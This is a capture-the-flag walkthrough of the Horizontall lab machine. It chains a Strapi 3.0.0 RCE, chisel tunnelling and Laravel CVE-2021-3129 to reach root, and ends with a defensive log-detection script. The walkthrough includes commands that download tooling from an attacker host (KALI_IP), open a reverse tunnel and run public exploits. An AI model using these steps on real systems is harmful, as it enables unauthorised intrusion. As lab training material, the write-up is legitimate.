Horizontall (HTB – Easy)

The machine exposes a simple website on port 80 that hides an API subdomain used by a Strapi CMS instance. An unauthenticated RCE in Strapi 3.0.0 provides a foothold. Privilege escalation is achieved by port-forwarding an internal Laravel service and exploiting CVE-2021-3129.

Overview

Target: horizontall.htb (10.129.62.173)
Initial vector: Strapi 3.0.0 unauthenticated RCE
Privilege escalation: Laravel 8 CVE-2021-3129 via internal port 8000

Enumeration

Nmap:

22/tcp open  ssh
80/tcp open  http (nginx 1.14.0)

Port 80 redirects to http://horizontall.htb. The main page looks static and directory fuzzing with wfuzz does not reveal anything useful.

Inspecting the page source and its JavaScript files for http:// strings reveals:

http://api-prod.horizontall.htb/reviews

Add api-prod.horizontall.htb to /etc/hosts and browse it. Fuzzing discovers:

/admin
/admin/init

/admin/init identifies the backend as Strapi:

$ curl http://api-prod.horizontall.htb/admin/init
-> Strapi 3.0.0

Foothold – Strapi 3.0.0 RCE

Searchsploit shows an unauthenticated RCE exploit for Strapi 3.0.0. Download it:

$ searchsploit strapi 3.0.0
$ searchsploit -m <exploit>

Run the Python exploit against api-prod.horizontall.htb to obtain a shell as the strapi user.

From there, enumerate the filesystem:

$ cat /etc/passwd
-> strapi home: /opt/strapi
$ cd /home
-> user.txt

Privilege Escalation – Internal Laravel

Check listening ports:

$ netstat -nat
-> 1337, 8000 (localhost only)

Curling port 8000 locally:

$ curl http://localhost:8000
-> Laravel v8

To reach it from the attacker machine, use chisel for reverse port forwarding.

Port Forwarding with Chisel

On attacker:

$ ./chisel server --reverse -p 1234

On victim:

$ wget http://KALI_IP/chisel
$ chmod +x chisel
$ ./chisel client KALI_IP:1234 R:8000:localhost:8000

Now http://127.0.0.1:8000 on the attacker shows the Laravel app.

Laravel CVE-2021-3129

Laravel 8 is vulnerable to CVE-2021-3129 (Ignition debug RCE) in configurations where the Ignition debug page is enabled. Use a public exploit (e.g. CVE-2021-3129_exploit) against the forwarded port:

$ python3 CVE-2021-3129_exploit.py http://127.0.0.1:8000

The exploit yields a shell as root inside the container/host running Laravel. From there, read /root/root.txt.
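From the defender's side, both stages of this chain leave web-server log traces: the Strapi version disclosure through /admin/init and the Ignition execute-solution endpoint that CVE-2021-3129 abuses. The following added example (not part of the original write-up, and not from either project) parses nginx combined-format access log lines and flags those two indicators; the sample log lines are constructed, not taken from the machine.

```python
import re
from typing import Dict, List, Optional

# Regex for the nginx "combined" access log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Indicators drawn from this write-up's attack chain, used defensively:
# - /admin/init is the Strapi endpoint that discloses the CMS version;
# - CVE-2021-3129 is reached through Ignition's execute-solution endpoint,
#   which only exists while Laravel runs with APP_DEBUG=true.
RULES = {
    "strapi-version-disclosure": ("GET", re.compile(r"^/admin/init$")),
    "laravel-ignition-solution": ("POST", re.compile(r"^/_ignition/execute-solution")),
}


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(lines: List[str]) -> List[Dict[str, str]]:
    """Return one hit per log line that matches a rule (method and path)."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        for name, (method, path_re) in RULES.items():
            if rec["method"] == method and path_re.search(rec["path"]):
                hits.append({"rule": name, "ip": rec["ip"], "path": rec["path"], "status": rec["status"]})
    return hits


# Constructed sample lines. The Ignition request arriving from 127.0.0.1 is what a
# chisel-style pivot into a localhost-only service looks like to the Laravel host.
SAMPLE_LOG = [
    '10.10.14.5 - - [10/Oct/2021:12:00:01 +0000] "GET /reviews HTTP/1.1" 200 512 "-" "curl/7.74"',
    '10.10.14.5 - - [10/Oct/2021:12:00:03 +0000] "GET /admin/init HTTP/1.1" 200 130 "-" "curl/7.74"',
    '127.0.0.1 - - [10/Oct/2021:12:05:10 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 44 "-" "python-requests/2.25"',
    '10.10.14.5 - - [10/Oct/2021:12:06:00 +0000] "GET /index.html HTTP/1.1" 304 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit)
```

Disabling APP_DEBUG in production removes the Ignition endpoint entirely, so any hit on the second rule after that change is worth an immediate look.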

Conclusion

Horizontall chains hidden subdomain discovery, Strapi 3.0.0 unauthenticated RCE, and an internal Laravel 8 instance vulnerable to CVE-2021-3129. By pivoting through chisel to the internal service and exploiting Laravel, full system compromise is achieved.